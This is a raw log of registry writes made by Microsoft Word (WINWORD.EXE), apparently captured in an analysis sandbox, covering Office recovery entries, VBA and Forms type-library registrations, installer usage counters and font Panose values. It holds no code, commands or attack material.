HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
qy'
71792700F80C0000010000000000000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831829
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831948
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831949
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
F80C0000A015F8FC76DAD40100000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
*z'
2A7A2700F80C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
t{'
747B2700F80C00000600000001000000AA000000020000009A0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C006200720069007400740061005F0068006F006C006C00650072006D0061006E006E005F0062006500770065007200620075006E006700730075006E007400650072006C006100670065006E002E0064006F006300000000000000
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831950
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831951
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1315831809
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1315831809
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1315831810
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1315831810
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1315831811
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1315831811
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1315831812
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{2941C4E5-A1C4-4FA0-B353-9094FE565246}
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1AE179
1AE179
04000000F80C00004C00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C004200720069007400740061005F0048006F006C006C00650072006D0061006E006E005F0042006500770065007200620075006E006700730075006E007400650072006C006100670065006E002E0064006F0063002A0000004200720069007400740061005F0048006F006C006C00650072006D0061006E006E005F0042006500770065007200620075006E006700730075006E007400650072006C006100670065006E002E0064006F00630000000000010000000000000084C7E9FC76DAD40179E11A0079E11A0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49A2-98D6-789CC457553C}\2.0
Microsoft Forms 2.0 Object Library
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49A2-98D6-789CC457553C}\2.0\FLAGS
6
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49A2-98D6-789CC457553C}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49A2-98D6-789CC457553C}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
3320
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
02070309020205020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
05050102010706020507
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
05000000000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
02020609040205080304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
02030600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
02010600030101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
020B0609070205080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
020B0600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
02020509000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
020B0600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
02040604050505020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
020B0304020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
02040503050203030202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
010A0502050306030303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
03080600000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
02040503050406030204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
00000000000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
02030600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
02030609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
02030609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
02030600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
02030600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
02030609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
02030609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
01010101010101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
020B0503040102020104
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
020B0600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
020B0609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
020B0609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
020B0600000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
020B0609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
020B0609000101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
020B0806030902050204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
02020503030404060203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
020B0609040504020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
020B0503020000020004
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
020B0503020000020004
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
01010100010101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
020B0503020204020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
020B0503020204020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
02020509000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
02020500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
03000500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
020B0609070205080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
020B0600070205080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
020B0600070205080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
020B0600070205080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
020B0600070205080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
02020609040205080304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
02020600040205080304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
02020600040205080304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
02000500030200090000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
02000504070300020003
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
02020602070100000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
020B0504020000000003
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
020B0702040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
02010600030101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
02010609030101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
02010609030101010101
3320
WINWORD.EXE
write
